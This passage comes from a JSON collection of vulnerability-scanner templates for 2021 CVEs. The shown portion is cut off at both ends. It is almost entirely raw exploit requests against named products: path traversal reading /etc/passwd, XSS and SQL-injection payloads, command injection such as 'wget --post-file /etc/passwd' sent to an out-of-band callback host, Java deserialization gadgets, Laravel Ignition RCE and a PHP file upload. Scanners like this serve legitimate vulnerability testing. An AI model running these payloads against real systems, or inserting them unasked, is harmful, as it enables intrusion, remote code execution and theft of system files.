Inclusion","severity":"medium"},"requests":[{"raw":["GET /log_download.cgi?type=../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nCache-Control: max-age=0\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n","GET /log_download.cgi?type=../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","sshd:[x*]","root:[$]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24236","info":{"name":"WordPress Imagements <=1.2.5 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-comments-post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"author\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"email\"\n\n{{randstr}}@email.com\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"url\"\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"checkbox\"\n\n\nyes\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"naam\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"image\"; filename=\"{{php}}\"\nContent-Type: image/jpeg\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"submit\"\n\nPost Comment\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment_post_ID\"\n\n{{post}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment_parent\"\n\n0\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--\n","GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]}]}]},{"id":"CVE-2021-30128","info":{"name":"Apache OFBiz <17.12.07 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/SOAPService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ser=\"http://ofbiz.apache.org/service/\">\n  <soapenv:Header/>\n    <soapenv:Body>\n      <ser>\n        <map-Map>\n          <map-Entry>\n            <map-Key>\n              <cus-obj>{{generate_java_gadget(\"dns\", \"https://{{interactsh-url}}\", \"hex\")}}</cus-obj>\n            </map-Key>\n          <map-Value>\n        <std-String/>\n        </map-Value>\n        </map-Entry>\n      </map-Map>\n      </ser>\n    </soapenv:Body>\n</soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["value=\"errorMessage\""]}]}]},{"id":"CVE-2021-43725","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?data[performredirect]=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&page=login"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>","name=\"data[performredirect]"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22005","info":{"name":"VMware vCenter Server - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\ntest_data\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","status_code_2 == 201","contains(body_1, 'VMware vSphere')","content_length_2 == 0"],"condition":"and"}]}]},{"id":"CVE-2021-37416","info":{"name":"Zoho ManageEngine ADSelfService Plus <=6103 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["></iframe><script>alert(1)</script>","adsf/js/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33544","info":{"name":"Geutebruck - Remote Command Injection","severity":"high"},"requests":[{"raw":["GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-42565","info":{"name":"myfactory FMS  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39316","info":{"name":"WordPress DZS Zoomsounds <=6.50 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27561","info":{"name":"YeaLink DM 3.6.0.20 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid","gid","groups"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-25078","info":{"name":"Affiliates Manager < 2.9.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /?wpam_id=1 HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-For: <img src onerror=alert(document.domain)>\n","GET /wp-admin/admin.php?page=wpam-clicktracking HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200 && status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"<img src onerror=alert(document.domain)>\")","contains(body_3, \"Affiliates Manager Click Tracking\")"],"condition":"and"}]}]},{"id":"CVE-2021-21287","info":{"name":"MinIO Browser API - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /minio/webrpc HTTP/1.1\nHost: {{interactsh-url}}\nContent-Type: application/json\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36\nContent-Length: 76\n\n{\"id\":1,\"jsonrpc\":\"2.0\",\"params\":{\"token\":  \"Test\"},\"method\":\"web.LoginSTS\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["We encountered an internal error"]}]}]},{"id":"CVE-2021-25104","info":{"name":"WordPress Ocean Extra <1.9.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/?step=demo&page=owp_setup&a\"><script>alert(/XSS/)</script>   HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["OceanWP","><script>alert(/XSS/)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45422","info":{"name":"Reprise License Manager 14.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goform/activate_process?isv=&akey=&hostid=&count=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>\"><input type=","value: \"><script>alert(document.domain)</script>)<br>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21805","info":{"name":"Advantech R-SeeNet 2.4.12 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/ping.php?hostname=|dir"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Ping |dir</title>","bottom.php"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24389","info":{"name":"WordPress FoodBakery <2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29505","info":{"name":"XStream <1.4.17 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n    <unserializable-parents/>\n    <java.util.PriorityQueue>\n        <default>\n            <size>2</size>\n        </default>\n        <int>3</int>\n        <javax.naming.ldap.Rdn_-RdnEntry>\n            <type>12345</type>\n            <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n                <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>\n            </value>\n        </javax.naming.ldap.Rdn_-RdnEntry>\n        <javax.naming.ldap.Rdn_-RdnEntry>\n            <type>12345</type>\n            <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>\n                <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>\n                    <parsedMessage>true</parsedMessage>\n                    <soapVersion>SOAP_11</soapVersion>\n                    <bodyParts/>\n                    <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>\n                        <attachmentsInitialized>false</attachmentsInitialized>\n                        <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>\n                            <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>\n                                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>\n                                    <names>\n                                        <string>aa</string>\n                                        <string>aa</string>\n                                    </names>\n                                    <ctx>\n                                        <environment/>\n                                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>\n                                            <java.rmi.server.RemoteObject>\n                                                <string>UnicastRef</string>\n                                                <string>{{interactsh-url}}</string>\n                                                <int>1099</int>\n                                                <long>0</long>\n                                                <int>0</int>\n                                                <long>0</long>\n                                                <short>0</short>\n                                                <boolean>false</boolean>\n                                            </java.rmi.server.RemoteObject>\n                                        </registry>\n                                        <host>{{interactsh-url}}</host>\n                                        <port>1099</port>\n                                    </ctx>\n                                </candidates>\n                            </aliases>\n                        </nullIter>\n                    </sm>\n                </message>\n            </value>\n        </javax.naming.ldap.Rdn_-RdnEntry>\n    </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-27315","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com&comment=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-3654","info":{"name":"Nova noVNC - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//interact.sh/%2f.."],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]},{"type":"status","status":[302,301]}]}]},{"id":"CVE-2021-21799","info":{"name":"Advantech R-SeeNet 2.4.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Telnet </title><script>alert(document.domain)</script><title></title>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22122","info":{"name":"FortiWeb - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error3?msg=30&data=';alert('document.domain');//","{{BaseURL}}/omni_success?cmdb_edit_path=\");alert('document.domain');//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert('document.domain')","No policy has been chosen."],"condition":"and"}]}]},{"id":"CVE-2021-20792","info":{"name":"WordPress Quiz and Survey Master <7.1.14 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mlw_quiz_list&s=\"></script><script>alert(document.domain)</script>&paged=\"></script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24452","info":{"name":"WordPress W3 Total Cache <2.1.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=w3tc_extensions&extension='-alert(document.domain)-' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, 'extensions/\\'-alert(document.domain)-\\'') && contains(body_2, 'w3-total-cache')","contains(header_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2021-3223","info":{"name":"Node RED Dashboard <2.26.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd","{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js"],"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["Node-RED web server is listening"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-27319","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-45382","info":{"name":"D-Link - Remote Command Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/ddns_check.ccp"],"body":"ccp_act=doCheck&ddnsHostName=;curl https://{{interactsh-url}};&ddnsUsername={{string1}}&ddnsPassword={{string2}}","matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-24286","info":{"name":"WordPress Plugin Redirect 404 to Parent 1.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=moove-redirect-settings&tab=%22+style%3Danimation-name%3Arotation+onanimationstart%3D%22alert%28document.domain%29%3B HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type_2, \"text/html\")","contains(body_2, \"alert%28document.domain%29\") && contains(body_2, \"Moove redirect 404\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2021-41569","info":{"name":"SAS/Internet 9.4 1520 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40968","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[newpassword2]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21315","info":{"name":"Node.JS System Information Library <5.3.1 - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20{{interactsh-url}})"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wget --post-file /etc/passwd {{interactsh-url}}","name","running","pids"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3017","info":{"name":"Intelbras WIN 300/WRN 342 - Credentials Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.asp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["def_wirelesspassword =","<title>Roteador Wireless</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["def_wirelesspassword = \"([A-Za-z0-9=]+)\";"],"part":"body"}]}]},{"id":"CVE-2021-24288","info":{"name":"WordPress AcyMailing <7.5.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-41349","info":{"name":"Microsoft Exchange Server Pre-Auth POST Based Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /autodiscover/autodiscover.json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["alert(document.domain);","a=\"\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"word","negative":true,"words":["A potentially dangerous Request.Form value was detected from the client"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-23241","info":{"name":"MERCUSYS Mercury X18G 1.0.5 Router - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/loginLess/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24979","info":{"name":"Paid Memberships Pro < 2.6.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=pmpro-discountcodes&s=s\"+style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"style=animation-name:rotation+onanimationstart=alert(document.domain)//\")","contains(body_2, \"Paid Memberships Pro - Membership Plugin for WordPress\")"],"condition":"and"}]}]},{"id":"CVE-2021-26086","info":{"name":"Atlassian Jira Limited -  Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26292","info":{"name":"AfterLogic Aurora and WebMail Pro < 7.7.9 - Full Path Disclosure","severity":"low"},"requests":[{"raw":["DELETE /dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["caldav_public_user","GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2021-39322","info":{"name":"WordPress Easy Social Icons Plugin < 3.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php/</script><script>alert(document.domain)</script>/?page=cnss_social_icon_page HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24947","info":{"name":"WordPress Responsive Vector Maps < 6.4.2 - Arbitrary File Read","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42258","info":{"name":"BillQuick Web Suite SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\n__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode(\"{{VS}}\")}}&__VIEWSTATEGENERATOR={{url_encode(\"{{VSG}}\")}}&__EVENTVALIDATION={{url_encode(\"{{EV}}\")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96\n"],"matchers":[{"type":"word","part":"body","words":["System.Data.SqlClient.SqlException","Incorrect syntax near","_ACCOUNTLOCKED"],"condition":"and"}],"extractors":[{"type":"xpath","name":"VS","internal":true,"xpath":["/html/body/form/div/input[@id='__VIEWSTATE']"],"attribute":"value"},{"type":"xpath","name":"VSG","internal":true,"xpath":["/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"],"attribute":"value"},{"type":"xpath","name":"EV","internal":true,"xpath":["/html/body/form/div/input[@id='__EVENTVALIDATION']"],"attribute":"value"}]}]},{"id":"CVE-2021-25864","info":{"name":"Hue Magic 3.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29625","info":{"name":"Adminer <=4.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3129","info":{"name":"Laravel with Ignition <= v8.4.2 Debug Mode - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"AA\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": 